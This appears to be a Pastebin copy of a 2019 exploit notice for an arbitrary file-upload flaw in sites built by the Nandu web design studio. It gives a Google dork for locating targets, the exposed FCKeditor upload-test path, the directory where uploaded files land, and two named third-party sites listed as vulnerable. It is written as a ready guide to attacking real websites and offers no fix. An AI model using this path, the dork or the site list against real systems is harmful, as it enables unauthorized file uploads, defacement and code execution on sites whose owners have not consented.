API tools faq
paste
Advertisement
KingSkrupellos

Schwabe Slovakia WebDesign Studio Nandu Insert File

KingSkrupellos
May 21st, 2019
189
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.24 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21/05/2019
  7. # Vendor Homepage : nandu.cz
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Copyright © 2012 Schwabe Slovakia s.r.o., webdesign studio nandu
  12. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ####################################################################
  18.  
  19. # Description About Software :
  20. *****************************
  21. Schwabe Slovakia Studio Nandu is a Web Design Company in Czech Republic.
  22.  
  23. ####################################################################
  24.  
  25. # Impact :
  26. ***********
  27. Schwabe Slovakia Studio Nandu is prone to a vulnerability that lets attackers
  28. upload arbitrary files because it fails to adequately sanitize user-supplied input.
  29.  
  30. An attacker can exploit this vulnerability to upload arbitrary code and execute
  31. it in the context of the webserver process. This may facilitate unauthorized access
  32. or privilege escalation; other attacks are also possible.
  33.  
  34. ####################################################################
  35.  
  36. # Arbitrary File Upload / Unauthorized File Insert Exploit :
  37. **************************************************
  38. /admin/fckeditor/editor/filemanager/connectors/uploadtest.html
  39.  
  40. Directory File Path :
  41. *******************
  42. /_data_editor/[YOURFILENAME].txt .jpg .gif .png
  43.  
  44. ####################################################################
  45.  
  46. # Example Vulnerable Sites :
  47. ************************
  48. [+] sinupret.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
  49.  
  50. [+] kaloba.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
  51.  
  52. ####################################################################
  53.  
  54. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  55.  
  56. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!